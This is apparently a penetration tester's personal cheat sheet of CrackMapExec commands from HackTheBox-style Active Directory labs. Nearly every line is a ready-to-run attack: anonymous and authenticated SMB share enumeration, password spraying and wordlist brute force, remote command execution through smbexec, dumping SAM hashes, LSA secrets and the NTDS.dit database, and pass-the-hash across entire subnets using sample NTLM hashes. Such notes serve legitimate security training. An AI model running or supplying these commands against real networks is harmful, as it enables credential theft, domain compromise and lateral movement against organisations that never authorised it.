CrackMapExec

# Do this first 
cd ~/Crackmapexec
source ~/.zshrc
poetry run crackmapexec -h

# If it doesnt work and it returns error just try another user. Because it works
crackmapexec smb 10.129.14.128 --shares -u '' -p ''
crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares

# This will execute spider to department shares
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'

# It will display the users in the domain 
# You should scan the Domain Controller IP and have a admin priv
crackmapexec smb 10.129.42.198 -u "user" -p "password" --users

# It will display the available groups in the domain
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups

# It will display the logged users in the domain
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --loggedon-users

# This will show the C: drive or D: drive
crackmapexec smb 10.129.42.197 -u "user" -p "password" --disks

# This will show Password Policy that could potentially lead to making a password list
crackmapexec smb 10.129.42.197 -u "user" -p "password" --pass-pol

# It will bruteforce for username and passowrd
poetry run crackmapexec smb 10.10.10.10 -u username.list -p password.list

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

# This will continue the bruteforce even we have access credential
poetry run crackmapexec smb 10.10.10.10 -u username.list -p password.list --continue-on-success

# Just another example 
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth

crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth --continue-on-success

# IMPORTANT - The domain admin will be named (Pwn3d!) but the regular user returns none

# It will use a wordlists to bruteforce for password
crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt

# It will run whoami in the target system
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

# It will display the logged users
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

# It will display the sam password hash
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

poetry run crackmapexec smb 10.129.202.137 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

# It will dump the lsa
poetry run crackmapexec smb 10.129.202.137 --local-auth -u ITbackdoor -p matrix --lsa

# This will get the ntds.dit database 
poetry run crackmapexec smb 10.129.95.160 -u jmarston -p P@ssword! --ntds

# Pass the hash attack
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

# Pass the hash attack on subnet and on each system in that subnet
# Like pc1, pc 10, pc 18,
sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453

crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 --local-auth

# Pass the hash attack with command
crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami